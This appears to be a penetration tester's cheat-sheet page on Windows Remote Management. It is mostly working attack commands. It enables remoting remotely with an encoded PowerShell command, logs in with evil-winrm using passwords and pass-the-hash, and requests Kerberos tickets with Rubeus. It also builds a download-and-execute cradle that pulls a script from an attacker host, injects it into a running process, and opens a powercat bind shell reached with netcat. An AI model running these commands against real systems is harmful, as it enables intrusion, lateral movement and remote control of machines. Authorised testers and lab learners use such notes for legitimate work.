WinRM / PSRemoting

Windows Remote Management / PowerShell Remoting

Enable WinRM

Using PowerShell (takes ~1m to be applied):

PS > Enable-PSRemoting -Force
PS > Set-Item wsman:\localhost\client\trustedhosts * -Force

Remotely with CME:

$ cme smb 10.10.13.37 -u snovvcrash -p 'Passw0rd!' -x 'powershell -enc RQBuAGEAYgBsAGUALQBQAFMAUgBlAG0AbwB0AGkAbgBnACAALQBGAG8AcgBjAGUAOwBTAGUAdAAtAEkAdABlAG0AIAB3AHMAbQBhAG4AOgBcAGwAbwBjAGEAbABoAG8AcwB0AFwAYwBsAGkAZQBuAHQAXAB0AHIAdQBzAHQAZQBkAGgAbwBzAHQAcwAgACoACgA=' --no-output

From Windows

https://0xdf.gitlab.io/2019/08/17/htb-helpline-win.html#enable-winrm

PS > winrm get winrm/config
PS > winrm set winrm/config/client '@{TrustedHosts="*"}'
PS > $sess = New-PSSession -ComputerName 192.168.11.1 -Credential $cred
PS > Enter-PSSession -Session $sess
PS > Copy-Item .\file.txt -Destination "C:\users\administrator\music\" -ToSession $sess

From Linux

Evil-WinRM

https://github.com/Hackplayers/evil-winrm

Basic syntax:

$ evil-winrm -u '[MEGACORP\]snovvcrash' -p 'Passw0rd!' -i 10.10.13.37 -s `pwd` -e `pwd`
$ evil-winrm -u '[MEGACORP\]snovvcrash' -H fc525c9683e8fe067095ba2ddc971889 -i 10.10.13.37 -s `pwd` -e `pwd`

Always use full username when authenticating as a domain user, because if there're 2 users sharing the same name (a local user and a domain user), say WORKGROUP\Administrator and MEGACORP\Administrator, and you're trying to authenticate as a domain admin without providing the domain prefix, authentication will fail.

Execute a .NET binary:

*Evil-WinRM* PS > Invoke-Binary Rubeus.exe "asktgt, /domain:megacorp.local, /user:snovvcrash, /rc4:fc525c9683e8fe067095ba2ddc971889, /nowrap"

Spawn interactive bind shell with powercat.ps1 and Invoke-PSInject.ps1:

$ sed -i s/powercat/pwcat/g pwcat.ps1
$ echo 'powercat -l -p 1337 -e cmd.exe' >> pwcat.ps1
$ echo 'IEX(New-Object Net.WebClient).DownloadString(''http://10.10.13.37/pwcat.ps1'')' | iconv -t UTF-16LE | base64 -w0
*Evil-WinRM* PS > Get-Process
*Evil-WinRM* PS > Invoke-PSInject.ps1
*Evil-WinRM* PS > Invoke-PSInject -ProcId <PID> -PoshCode <BASE64_CMD>
$ rlwrap nc 192.168.1.11 1337

pwsh

$ pwsh
PS > $sess = New-PSSession -ComputerName 192.168.11.1 -Credential $cred -Authentication Negotiate
PS > Enter-PSSession -Session $sess

Last updated 1 year ago